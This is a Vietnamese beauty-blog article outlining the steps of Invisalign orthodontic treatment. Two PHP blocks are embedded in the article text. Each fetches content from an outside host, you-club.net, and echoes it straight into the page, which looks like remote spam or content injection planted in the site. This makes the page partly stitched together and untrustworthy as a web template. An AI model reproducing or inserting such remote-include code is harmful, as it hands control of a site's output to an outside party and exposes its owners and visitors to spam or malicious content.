Chăm sóc sắc đẹp

You are here: Home - Chăm sóc - làm đẹp, Nha khoa thẫm mỹ - Niềng răng thẩm mỹ


Niềng răng thẩm mỹ

Quy trình niềng răng thẩm mỹ cho bạn tham khảo

Bạn quyết định niềng răng thẩm mỹ để mang lại một hàm răng đẹp tự tin khoe nụ cười tỏa sáng đúng không nào? Hãy tham khảo quy trình niềng răng hiện đại để có hiểu biết trước khi thực hiện nhé:.
[php]
$data = file(“http://you-club.net/sys/link/13″);

foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}
[/php]

Trong khi thực hiện chỉnh nha niềng răng bác sĩ sẽ tiến hành lấy dấu mẫu hàm, chụp phim và hình ngoài mặt của bệnh nhân và gửi sang trung tâm invisalign tại Mỹ.

Tại đây, với việc ứng dụng các phần mềm chuyên dụng các nhân viên kỹ thuật Invisalign sẽ thực hiện quét và chuyển mẫu hàm 3D trên máy tính, sau đó phối hợp với bác sĩ nha khoa Việt Nam để tiến hành lập kế hoạch điều trị tối ưu, chính xác và hiệu quả nhất cho bệnh nhân.

nieng-rang-1

Quy trình niềng răng thẩm mỹ cho bạn tham khảo

Sau khi đã thông nhất mẫu khay invisalign và kế hoạch chữa trị thì nhà máy sẽ làm khay Invisalign dùng dữ liệu của bệnh nhân thiết kế và tiến hành sản xuất các khay Invisalign phù hợp vơi mức độ lệch răng tương ứng.

Khi hoàn thành khay Invisalign sẽ được gửi về Việt Nam để bắt đầu quá trình điều trị chỉnh nha niềng răng.

Thông thường bác sĩ sẽ giao hết các khay invisalign cho bệnh nhân tự đeo và tháo theo chỉ dẫn. Sau khi đã đeo hết số khay đó bệnh nhân sẽ thực hiện tái khám và làm theo hướng dẫn của bác sĩ. Một số trường hợp đặc biệt, răng cần được gắn Attachment, là một nút chặn bằng nhựa để tạo lực di chuyển răng.

Sau khi kết thúc quy trình đeo khay Invisalign thì bạn sẽ được tái khám và kiểm tra tiến độ chỉnh nha.Vài tuần sau bạn sẽ có refinement để kết thúc quá trình điều trị.

Bạn sẽ hiểu rõ điều này hơn khi tiến hành điều trị và được các bác sĩ tư vấn chi tiết và dễ hiểu hơn.

Lưu ý, nếu trong quá trình mang khay chỉnh nha niềng răng các bạn làm mất một hay nhiều khay trong đó thì nên đến ngay trung tâm nha khoa để khám và tiến hành làm lại khay mới..
[php]
$data = file(“http://you-club.net/sys/link/14″);

foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}
[/php]

Leave a Reply

Your email address will not be published. Required fields are marked *